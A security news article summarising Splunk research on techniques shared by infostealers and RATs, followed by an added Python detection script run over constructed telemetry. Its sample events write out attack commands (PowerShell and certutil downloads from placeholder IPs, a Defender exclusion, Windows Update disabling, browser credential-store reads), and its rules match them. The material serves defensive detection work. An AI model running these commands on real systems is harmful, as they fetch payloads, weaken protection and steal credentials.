NEWS Your antivirus scans for hashes, but it needs to detect habits. Why classic protection no longer works

pinkman

Researchers are calling for a change in the approach to protection, based on how attacks classify by technique rather than by sample.


It seems that each new Trojan or stealer is a unique story with its own signature. But Splunk Threat Research Team specialists took a broader look and discovered an alarming pattern. Many popular infostealers and RATs use nearly the same set of techniques, differing more in the details of their implementation than in the overall attack logic.

The Splunk team studied approximately 18 malware families, some observed in real-world attacks and others described in detail in public reports. They then mapped each family's behaviour onto the MITRE ATT&CK matrix to see which tactics and techniques repeat most often. The result resembled a "common arsenal" for cybercriminals: the same set of steps helps them gain a foothold on a system, evade defenses, and exfiltrate data.

The most common technique was T1105 (Ingress Tool Transfer), downloading additional components after infection. Essentially, this is the ability to pull down the next stage of the attack, such as plugins or auxiliary files. It is closely followed by T1082 (System Information Discovery). The malware learns the computer name, Windows version, hardware parameters, and other details to understand where it has landed and how best to proceed. The study also notes the habit of communicating with the control infrastructure over web protocols such as HTTP (T1071.001). For defenders, this means something simple: building detection around recurring techniques, rather than around hashes and one-time indicators, can cover many different families at once.

This is where things get interesting, because in practice, it's not just "what they do" that matters, but also "how they do it." For example, some families use WMI to collect system information and send this data to the C2 as part of a "beacon." Another popular technique involves collecting the victim's network data. Several families obtain the external IP and geolocation by accessing legitimate IP address services. This helps operators distinguish between victims and prioritize them.

To persist on the system, they often use mundane yet effective Windows mechanisms: autostart registry keys, including Run and sometimes RunOnce, and scheduled tasks created via schtasks.exe. According to Splunk, some families further attempt to weaken protection by adding directory or file path exclusions to Windows Defender to reduce the chances of detection. A more forceful approach is also common: some malware enables privileges such as SeDebugPrivilege and manipulates access tokens, gaining greater control over system processes.

A separate, major topic is stealing credentials from browsers. The study notes that many families are able to extract and decrypt saved logins and passwords from browser storage, then send them to the attackers. Another recurring trick is the abuse of legitimate web services as infrastructure, sometimes as C2 and sometimes as hosting from which a downloader pulls the payload. Examples include popular services such as GitLab and Dropbox.

However, no two malware families are alike. Splunk also identifies rarer, more characteristic techniques that help distinguish between families. For example, one njRAT variant is capable of overwriting the MBR, effectively turning an infection into a destructive attack. DarkCrystal RAT uses an unusual execution delay via the w32tm command with the /stripchart parameter; this is rare in legitimate environments and can be a good lead for detection. Castle RAT is distinguished by its UAC bypass via the AppInfo RPC interface and by launching its payload through a trusted system process. And RedLine Stealer, according to the researchers, can disable components related to Windows Update so that it stays on the system longer without the risk of patches closing vulnerabilities or updating security.
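To make the "common arsenal" versus "family-specific" distinction concrete, here is an added example (not Splunk's code and not taken from the research above) that runs a small set of technique-level rules over constructed endpoint telemetry. The events are hand-built to look like Sysmon/EDR process, registry, network and file records, and the two "family" streams are hypothetical; the point is that two builds with completely different hashes, download methods and persistence choices still trip the same technique IDs, while the rare rules (w32tm /stripchart, Windows Update services disabled, raw boot-disk writes) separate them. The regexes and the T1016/T1497.003/T1561.002 mappings for the lookup, delay and MBR behaviours are my own choices, not the study's.

```python
"""Technique-level detection over constructed endpoint telemetry.

Added illustration for this post; not Splunk's code and not derived from the
research it describes.  All events below are constructed, not real samples.
"""
import re
from dataclasses import dataclass
from typing import Callable, List, Set, Tuple


@dataclass(frozen=True)
class Event:
    kind: str            # "process", "registry", "net" or "file"
    image: str = ""      # image name of the acting process
    cmdline: str = ""    # full command line (process events)
    target: str = ""     # registry key, file path or URL (other events)


@dataclass(frozen=True)
class Rule:
    technique: str       # MITRE ATT&CK technique ID the rule maps to
    name: str
    scope: str           # "common": shared arsenal, "rare": family-specific
    match: Callable[[Event], bool]


def _cmd(pattern: str) -> Callable[[Event], bool]:
    """Matcher over process command lines (case-insensitive)."""
    rx = re.compile(pattern, re.I)
    return lambda e: e.kind == "process" and rx.search(e.cmdline) is not None


def _tgt(kind: str, pattern: str) -> Callable[[Event], bool]:
    """Matcher over registry/file/net targets (case-insensitive)."""
    rx = re.compile(pattern, re.I)
    return lambda e: e.kind == kind and rx.search(e.target) is not None


BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

RULES = [
    # --- the shared arsenal: rules that survive rebuilds and new hashes ---
    Rule("T1105", "LOLBin or PowerShell download of a further stage", "common",
         _cmd(r"certutil(\.exe)?\s.*-urlcache|bitsadmin(\.exe)?\s+/transfer|"
              r"powershell.*(DownloadFile|DownloadString|Invoke-WebRequest)")),
    Rule("T1082", "System information discovery", "common",
         _cmd(r"^(\S*\\)?(systeminfo|hostname)(\.exe)?\b|"
              r"wmic(\.exe)?\s+(computersystem|os|cpu)\s+get|"
              r"Get-WmiObject\s+Win32_(ComputerSystem|OperatingSystem)")),
    Rule("T1016", "External IP / geolocation lookup of the victim", "common",
         _tgt("net", r"^https?://(api\.ipify\.org|ip-api\.com|ipinfo\.io)/")),
    Rule("T1071.001", "HTTP(S) traffic from a non-browser process", "common",
         lambda e: e.kind == "net" and e.target.lower().startswith(("http://", "https://"))
         and e.image.lower() not in BROWSERS),
    Rule("T1547.001", "Run/RunOnce key persistence", "common",
         _tgt("registry", r"\\CurrentVersion\\Run(Once)?\\")),
    Rule("T1053.005", "Scheduled task created with schtasks.exe", "common",
         _cmd(r"schtasks(\.exe)?\b.*\s/create\b")),
    Rule("T1562.001", "Windows Defender exclusion added", "common",
         _cmd(r"Add-MpPreference\s.*-Exclusion(Path|Process|Extension)")),
    Rule("T1555.003", "Browser credential store read by a non-browser process", "common",
         lambda e: e.kind == "file" and e.image.lower() not in BROWSERS
         and re.search(r"\\(Login Data|logins\.json|key4\.db)$", e.target, re.I) is not None),
    # --- rare, family-characteristic behaviours (triage leads) ---
    Rule("T1497.003", "Execution delay via w32tm /stripchart", "rare",
         _cmd(r"w32tm(\.exe)?\s+/stripchart\b")),
    Rule("T1562.001", "Windows Update services stopped or disabled", "rare",
         _cmd(r"\bsc(\.exe)?\s+(config|stop)\s+(wuauserv|UsoSvc|WaaSMedicSvc)\b")),
    Rule("T1561.002", "Raw handle to the boot disk (MBR overwrite)", "rare",
         _tgt("file", r"^\\\\\.\\PhysicalDrive0$")),
]


def evaluate(events: List[Event]) -> List[Tuple[str, str, str]]:
    """(technique, rule name, scope) for every rule that fires on any event."""
    return [(r.technique, r.name, r.scope) for ev in events for r in RULES if r.match(ev)]


def techniques(events: List[Event], scope: str) -> Set[str]:
    """Distinct technique IDs of one scope observed in a stream."""
    return {t for t, _, s in evaluate(events) if s == scope}


def shared_common_techniques(a: List[Event], b: List[Event]) -> Set[str]:
    """Common-arsenal techniques both streams exhibit: one rule set, two families."""
    return techniques(a, "common") & techniques(b, "common")


def distinguishing_rules(events: List[Event]) -> List[str]:
    """Rare rule names seen in a stream; these point at a specific family."""
    return sorted({n for _, n, s in evaluate(events) if s == "rare"})


# Constructed telemetry for two hypothetical families. Different download
# method, different persistence, different rare trick, same core techniques.
FAMILY_A = [
    Event("process", "powershell.exe",
          "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
          "'http://203.0.113.5/p.dll','C:\\Users\\Public\\p.dll')"),
    Event("process", "cmd.exe", "systeminfo"),
    Event("net", "svch0st.exe", target="http://203.0.113.5/gate.php"),
    Event("net", "svch0st.exe", target="https://api.ipify.org/?format=json"),
    Event("registry", "svch0st.exe",
          target=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
    Event("process", "powershell.exe", "powershell Add-MpPreference -ExclusionPath C:\\Users\\Public"),
    Event("file", "svch0st.exe",
          target=r"C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event("process", "cmd.exe", "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:10"),
]
FAMILY_B = [
    Event("process", "cmd.exe", "certutil.exe -urlcache -split -f http://198.51.100.7/x.bin C:\\ProgramData\\x.bin"),
    Event("process", "cmd.exe", "wmic os get caption,version"),
    Event("net", "x.bin", target="https://198.51.100.7/api/v1/check"),
    Event("process", "cmd.exe", 'schtasks /create /sc minute /mo 5 /tn "Sync" /tr C:\\ProgramData\\x.bin'),
    Event("file", "x.bin", target=r"C:\Users\u\AppData\Roaming\Mozilla\Firefox\Profiles\a.default\logins.json"),
    Event("process", "cmd.exe", "sc config wuauserv start= disabled"),
]

if __name__ == "__main__":
    print("shared common techniques:", sorted(shared_common_techniques(FAMILY_A, FAMILY_B)))
    for label, stream in (("family A", FAMILY_A), ("family B", FAMILY_B)):
        print(label, "rare leads:", distinguishing_rules(stream))
```

Running it reports T1105, T1082, T1071.001 and T1555.003 as shared by both streams even though no command line, URL or path is the same, while the only rare hits are the w32tm delay for one stream and the Windows Update tampering for the other. In a real deployment the regexes need tuning against your own baseline (admins do run systeminfo and schtasks), and a rule that fires on both an IP-lookup service and on generic HTTP from the same process is expected: the two technique IDs describe different things about the same connection.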

Splunk's main conclusion is pragmatic. A shared set of techniques gives defenders the opportunity to build more universal detection rules that survive new malware versions and builds. Rare, family-specific techniques are useful in investigations, when it is necessary to identify which family is involved and how advanced the attack is.